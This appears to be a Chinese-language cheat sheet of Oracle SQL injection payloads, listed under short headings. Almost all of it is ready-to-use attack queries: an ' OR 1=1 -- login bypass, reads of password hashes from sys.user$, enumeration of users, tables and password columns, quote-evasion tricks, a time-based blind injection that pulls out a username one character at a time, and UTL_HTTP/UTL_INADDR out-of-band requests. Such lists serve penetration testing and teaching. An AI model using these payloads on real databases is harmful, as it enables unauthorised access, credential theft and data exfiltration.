默认数据库
注释--
SELECT * FROM Users WHERE username = '' OR 1=1 --' AND password = '';
查询版本信息
SELECT banner FROM v$version WHERE banner LIKE 'Oracle%'; | SELECT banner FROM v$version WHERE banner LIKE 'TNS%'; | SELECT version FROM v$instance; |
数据库凭证 SELECT username FROM all_users; | SELECT name, password FROM sys.user$; | SELECT name, spare4 FROM sys.user$; |
查询数据库信息 — 查询当前库 SELECT name FROM v$database; | SELECT instance_name FROM v$instance; | SELECT global_name FROM global_name; | SELECT SYS.DATABASE_NAME FROM DUAL; |
用户数据库 SELECT DISTINCT owner FROM all_tables; |
主机名称 SELECT host_name FROM v$instance; (Privileged) | SELECT UTL_INADDR.get_host_name FROM dual; | SELECT UTL_INADDR.get_host_name('10.0.0.1') FROM dual; | SELECT UTL_INADDR.get_host_address FROM dual; |
查询表和列 — 查询表 SELECT table_name FROM all_tables; |
查询列 SELECT column_name FROM all_tab_columns;
从表中查询列 SELECT column_name FROM all_tab_columns WHERE table_name = 'Users';
从列中查询表 SELECT table_name FROM all_tab_columns WHERE column_name = 'password';
查询多个表信息 SELECT RTRIM(XMLAGG(XMLELEMENT(e, table_name || ',')).EXTRACT('//text()').EXTRACT('//text()') ,',') FROM all_tables; |
避免使用引号 SELECT 0x09120911091 FROM dual; | SELECT CHR(32)||CHR(92)||CHR(93) FROM dual; |
字符串拼接 SELECT 'a'||'d'||'mi'||'n' FROM dual; |
条件语句 SELECT CASE WHEN 1=1 THEN 'true' ELSE 'false' END FROM dual |
时间注入 SELECT UTL_INADDR.get_host_address('non-existant-domain.com') FROM dual;
AND (SELECT COUNT(*) FROM all_users t1, all_users t2, all_users t3, all_users t4, all_users t5) > 0 AND 300 > ASCII(SUBSTR((SELECT username FROM all_users WHERE rownum = 1),1,1));
查询权限
SELECT privilege FROM session_privs; | SELECT grantee, granted_role FROM dba_role_privs; (Privileged) |
DNS带外 SELECT UTL_HTTP.REQUEST('http://localhost') FROM dual; | SELECT UTL_INADDR.get_host_address('localhost.com') FROM dual; |